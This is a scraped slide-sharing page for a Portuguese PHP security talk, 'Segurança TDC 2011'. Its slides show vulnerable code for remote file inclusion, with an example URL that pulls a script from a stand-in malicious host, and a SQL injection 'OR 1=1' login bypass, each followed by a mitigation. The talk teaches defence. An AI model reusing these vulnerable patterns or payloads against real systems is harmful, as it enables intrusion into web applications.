Enviar pesquisa
Carregar
Segurança TDC 2011
•
1 gostou
•
513 visualizações
Kinn Julião
Seguir
Tecnologia
Denunciar
Compartilhar
Denunciar
Compartilhar
1 de 21
Recomendados
Website security
Website security
thiagosenac
Test
Test
astonishingphil07
Cultura ciudadana unidad 1 Ingrid Nieto
Cultura ciudadana unidad 1 Ingrid Nieto
Ingrid Aguilar
Khemah Transformasi Gereja 2013
Khemah Transformasi Gereja 2013
SIB Kuching Bahasa Malaysia
The Meaning of Wealth Protection
The Meaning of Wealth Protection
Trusted Advisory
Your Reflection - Courtesy of Setiawan Nurtjahja
Ask Yourself
Ask Yourself
Trusted Advisory
LOVE&Co.
プレスリリース 企業
プレスリリース 企業
LOVE&Co.
20151105行政院會後記者會(第3473次會議) https://www.youtube.com/watch?v=lQkojyYdF2c
20151105交通部:「2015年台北國際旅展籌辦情形」報告
20151105交通部:「2015年台北國際旅展籌辦情形」報告
R.O.C.Executive Yuan
Recomendados
Website security
Website security
thiagosenac
Test
Test
astonishingphil07
Cultura ciudadana unidad 1 Ingrid Nieto
Cultura ciudadana unidad 1 Ingrid Nieto
Ingrid Aguilar
Khemah Transformasi Gereja 2013
Khemah Transformasi Gereja 2013
SIB Kuching Bahasa Malaysia
The Meaning of Wealth Protection
The Meaning of Wealth Protection
Trusted Advisory
Your Reflection - Courtesy of Setiawan Nurtjahja
Ask Yourself
Ask Yourself
Trusted Advisory
LOVE&Co.
プレスリリース 企業
プレスリリース 企業
LOVE&Co.
20151105行政院會後記者會(第3473次會議) https://www.youtube.com/watch?v=lQkojyYdF2c
20151105交通部:「2015年台北國際旅展籌辦情形」報告
20151105交通部:「2015年台北國際旅展籌辦情形」報告
R.O.C.Executive Yuan
Борьба за свою землю.
Борьба за свою землю.
Борьба за свою землю.
sergnovoros
Humane Approach to Urban Planning Final
Humane Approach to Urban Planning Final
Priya Chaudhary
La tabla explica cómo formar los tiempos verbales básicos estudiados en inglés para ciclos de grado medio
Resumen tabla verbos inglés para Grado Medio
Resumen tabla verbos inglés para Grado Medio
marta velasco gonzalez
tarjetas en tres partes, serie rosa del aprendizaje de la lectura montessori
Palabras rosa
Palabras rosa
Eva Díaz Sánchez
Presentation given at the 5th Virtual Round Table on April 20th
Jazz up your Language classes with echnology
Jazz up your Language classes with echnology
Jennifer Verschoor
TeachMeet Int'l ONLINE - 3 min presentation delivered on March 3, 2012 by Jennifer Verschoor
Games for young learners
Games for young learners
Jennifer Verschoor
Urban Land use from the Human Elective for the Irish Leaving Cert. Contains some past exam questions. Deals with the Harp Project and urban issues in Dublin and Paris
Urban land use
Urban land use
Noel Hogan
Jennifer Verschoor gave a webinar for American TESOL on June 13th, 2012
Digital Skills for 21st Century Teachers
Digital Skills for 21st Century Teachers
Jennifer Verschoor
Useful for helping students revise and construct complete explanations, descriptions or arguments. Can be used for any subject.
Graphic Organisers
Graphic Organisers
Noel Hogan
Slides do treinamento ministrado sobre OWASP TOP 10
Slides do Treinamento - OWASP TOP 10 (Em português)
Slides do Treinamento - OWASP TOP 10 (Em português)
Julio Cesar Stefanutto
Segurança de suas aplicações em PHP
Segurança em PHP
Segurança em PHP
Augusto Pascutti
Apresentação sobre as 5 maiores vulnerabilidades em aplicações web, apresentado no evento JustJava 2011 em 14/05/2011.
Top 5 vulnerabilidades_em_aplicacoes_web
Top 5 vulnerabilidades_em_aplicacoes_web
Luis Asensio
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Luis Asensio
COnteúdo da Palestra sobre Desenvolvimento de aplicações seguras para Web
Desenvolvimento de Aplicações Web Seguras
Desenvolvimento de Aplicações Web Seguras
Dércio Luiz Reis
Como Mitigar ataques a Rede com snort
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
clebeer brandao
Como Mitigar ataques a Rede com snort
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
clebeer brandao
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas praticas de PHP
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
tdc-globalcode
Este conteúdo foi apresentado ao vivo no 3o. RootDay. Consiste de motivação com estatísticas, introdução à técnica de fuzzing, formas de usá-la, o software ZAP e uma demonstração.
Fuzzing com ZAP (Zed Attack Proxy)
Fuzzing com ZAP (Zed Attack Proxy)
Maurício Harley
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Magno Logan
Nesta palestra, abordo as principais formas de ataque, assim como diversas dicas de programação com PHP para tornar o seu sistema cada vez mais seguro, assim como também dicas de configurações do php.ini.
Desenvolvendo sistemas seguros com PHP
Desenvolvendo sistemas seguros com PHP
Flavio Souza
Slides de minha apresentação sobre segurança em PHP no PHPSC Conference 2012.
Segurança em aplicações php
Segurança em aplicações php
Rodrigo Dos Santos
Palestra PHP Seguro em 2013 apresentada no evento PHPSC Conf 2013 dia 26.10.2013 em Chapecó (SC) pelo especialista em Segurança de Sistemas Patrick Kaminski http://patrickkaminski.com/
PHP Seguro em 2013
PHP Seguro em 2013
Patrick Kaminski
Mais conteúdo relacionado
Destaque
Борьба за свою землю.
Борьба за свою землю.
Борьба за свою землю.
sergnovoros
Humane Approach to Urban Planning Final
Humane Approach to Urban Planning Final
Priya Chaudhary
La tabla explica cómo formar los tiempos verbales básicos estudiados en inglés para ciclos de grado medio
Resumen tabla verbos inglés para Grado Medio
Resumen tabla verbos inglés para Grado Medio
marta velasco gonzalez
tarjetas en tres partes, serie rosa del aprendizaje de la lectura montessori
Palabras rosa
Palabras rosa
Eva Díaz Sánchez
Presentation given at the 5th Virtual Round Table on April 20th
Jazz up your Language classes with echnology
Jazz up your Language classes with echnology
Jennifer Verschoor
TeachMeet Int'l ONLINE - 3 min presentation delivered on March 3, 2012 by Jennifer Verschoor
Games for young learners
Games for young learners
Jennifer Verschoor
Urban Land use from the Human Elective for the Irish Leaving Cert. Contains some past exam questions. Deals with the Harp Project and urban issues in Dublin and Paris
Urban land use
Urban land use
Noel Hogan
Jennifer Verschoor gave a webinar for American TESOL on June 13th, 2012
Digital Skills for 21st Century Teachers
Digital Skills for 21st Century Teachers
Jennifer Verschoor
Useful for helping students revise and construct complete explanations, descriptions or arguments. Can be used for any subject.
Graphic Organisers
Graphic Organisers
Noel Hogan
Destaque
(9)
Борьба за свою землю.
Борьба за свою землю.
Humane Approach to Urban Planning Final
Humane Approach to Urban Planning Final
Resumen tabla verbos inglés para Grado Medio
Resumen tabla verbos inglés para Grado Medio
Palabras rosa
Palabras rosa
Jazz up your Language classes with echnology
Jazz up your Language classes with echnology
Games for young learners
Games for young learners
Urban land use
Urban land use
Digital Skills for 21st Century Teachers
Digital Skills for 21st Century Teachers
Graphic Organisers
Graphic Organisers
Semelhante a Segurança TDC 2011
Slides do treinamento ministrado sobre OWASP TOP 10
Slides do Treinamento - OWASP TOP 10 (Em português)
Slides do Treinamento - OWASP TOP 10 (Em português)
Julio Cesar Stefanutto
Segurança de suas aplicações em PHP
Segurança em PHP
Segurança em PHP
Augusto Pascutti
Apresentação sobre as 5 maiores vulnerabilidades em aplicações web, apresentado no evento JustJava 2011 em 14/05/2011.
Top 5 vulnerabilidades_em_aplicacoes_web
Top 5 vulnerabilidades_em_aplicacoes_web
Luis Asensio
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Luis Asensio
COnteúdo da Palestra sobre Desenvolvimento de aplicações seguras para Web
Desenvolvimento de Aplicações Web Seguras
Desenvolvimento de Aplicações Web Seguras
Dércio Luiz Reis
Como Mitigar ataques a Rede com snort
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
clebeer brandao
Como Mitigar ataques a Rede com snort
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
clebeer brandao
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas praticas de PHP
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
tdc-globalcode
Este conteúdo foi apresentado ao vivo no 3o. RootDay. Consiste de motivação com estatísticas, introdução à técnica de fuzzing, formas de usá-la, o software ZAP e uma demonstração.
Fuzzing com ZAP (Zed Attack Proxy)
Fuzzing com ZAP (Zed Attack Proxy)
Maurício Harley
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Magno Logan
Nesta palestra, abordo as principais formas de ataque, assim como diversas dicas de programação com PHP para tornar o seu sistema cada vez mais seguro, assim como também dicas de configurações do php.ini.
Desenvolvendo sistemas seguros com PHP
Desenvolvendo sistemas seguros com PHP
Flavio Souza
Slides de minha apresentação sobre segurança em PHP no PHPSC Conference 2012.
Segurança em aplicações php
Segurança em aplicações php
Rodrigo Dos Santos
Palestra PHP Seguro em 2013 apresentada no evento PHPSC Conf 2013 dia 26.10.2013 em Chapecó (SC) pelo especialista em Segurança de Sistemas Patrick Kaminski http://patrickkaminski.com/
PHP Seguro em 2013
PHP Seguro em 2013
Patrick Kaminski
PPT del evento MVP Conf 2019, disertado por Enrique Dutra, sobre desarrollo seguro de aplicaciones móviles.
Presentacion de Seguridad - MVP Conf 2019
Presentacion de Seguridad - MVP Conf 2019
Enrique Gustavo Dutra
Orientações para desenvolvimento seguro em PHP
PHP Desenvolvimento Seguro
PHP Desenvolvimento Seguro
Flávio Lisboa
Palestra ministrada pelo Prof. Msc. Marcelo Lau
Ransomware
Ransomware
Marcelo Lau
Você já sentiu isso? Aquele frio na barriga e o coração batendo mais forte? Você não sabe o que, mas alguma coisa está dando errado no seu teste de penetração. Você não consegue penetrar em nada. Não serão apenas novas técnicas, mas verdadeiras mudanças na sua visão. Aquele momento que dá um estalo quando você vê como fazer de verdade e que tudo era tão simples. Te espero para contar todos os segredos.
Pentest com Kali Linux - LatinoWare 2015
Pentest com Kali Linux - LatinoWare 2015
Alcyon Ferreira de Souza Junior, MSc
Palestra ministrada pelo Prof. Msc. Marcelo Lau
Forense computacional e seguranca da informacao
Forense computacional e seguranca da informacao
Marcelo Lau
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
Conviso Application Security
Apresentação explicando um pouco sobre: - Testes de Segurança em Aplicações Web - Análise de Segurança - Engenharia Social - Fiddler - ZAP - Top 10 OWASP - Os maiores ataques Hackers - Como realizar um ataque - Metasploit - Desenvolvimento Seguro - Cross-site Scripting (XSS) - SQL Injection - DDOS
Workshop - Testes de Segurança
Workshop - Testes de Segurança
Alan Carlos
Semelhante a Segurança TDC 2011
(20)
Slides do Treinamento - OWASP TOP 10 (Em português)
Slides do Treinamento - OWASP TOP 10 (Em português)
Segurança em PHP
Segurança em PHP
Top 5 vulnerabilidades_em_aplicacoes_web
Top 5 vulnerabilidades_em_aplicacoes_web
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Top 5 vulnerabilidades_em_aplicacoes_web_e_seu
Desenvolvimento de Aplicações Web Seguras
Desenvolvimento de Aplicações Web Seguras
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
Modos De OperaçãO Snort Campusparty2010
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
TDC2018SP | Trilha Arq PHP - Seguranca de aplicacoes web com o uso de Boas pr...
Fuzzing com ZAP (Zed Attack Proxy)
Fuzzing com ZAP (Zed Attack Proxy)
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
Desenvolvendo sistemas seguros com PHP
Desenvolvendo sistemas seguros com PHP
Segurança em aplicações php
Segurança em aplicações php
PHP Seguro em 2013
PHP Seguro em 2013
Presentacion de Seguridad - MVP Conf 2019
Presentacion de Seguridad - MVP Conf 2019
PHP Desenvolvimento Seguro
PHP Desenvolvimento Seguro
Ransomware
Ransomware
Pentest com Kali Linux - LatinoWare 2015
Pentest com Kali Linux - LatinoWare 2015
Forense computacional e seguranca da informacao
Forense computacional e seguranca da informacao
Tratando as vulnerabilidades do Top 10 com php
Tratando as vulnerabilidades do Top 10 com php
Workshop - Testes de Segurança
Workshop - Testes de Segurança
Segurança TDC 2011
1.
Mantenha suas aplicações
protegidas contra usuários mal intencionados
2.
3.
Gerente de projetos
- RPM
4.
Consultor em Software
Livre
5.
7 anos de
experiência em Desenvolvimento
6.
Analista de Sistemas
7.
8.
9.
PHPConference, SOLISC e
etc.
10.
@kinncj, fb.com/kinncj, linkedin.com/in/kinncj
11.
12.
CSRF
13.
INJECTION
14.
XSS
15.
16.
XSS
17.
XSS
18.
19.
20.
<?php
21.
include $_GET['pagina'];
22.
// http://localhost/pagina=http://sitedomal.com/script.txt
23.
24.
<?php
25.
$paginas = array('home','admin');
26.
if(in_array($_GET['pagina'],$paginas)){
27.
include “../paginas/”.$_GET['pagina'].”.php”;
28.
}else{
29.
echo “Ops, pagina
nao encontrada”;
30.
}
31.
// http://localhost/pagina=http://sitedomal.com/script.txt
32.
CSRF
33.
34.
35.
SQL Injection
36.
37.
SQL Injection
38.
39.
$query_string = "SELECT
* FROM usuarios WHERE codigo = '{$usuario}' AND senha = '{$senha}'";
40.
41.
SELECT * FROM
usuarios WHERE codigo = '' OR 1=1 AND senha = '' OR 1=1
42.
PHP
43.
$usuario = mysql_real_escape_string(addslashes($usuario));
44.
$senha = mysql_real_escape_string(addslashes($senha));
45.
$query_string = "SELECT
* FROM usuarios WHERE codigo = '{$usuario}' AND senha = '{$senha}'"
46.
47.
48.
CSRF
49.
Injection
50.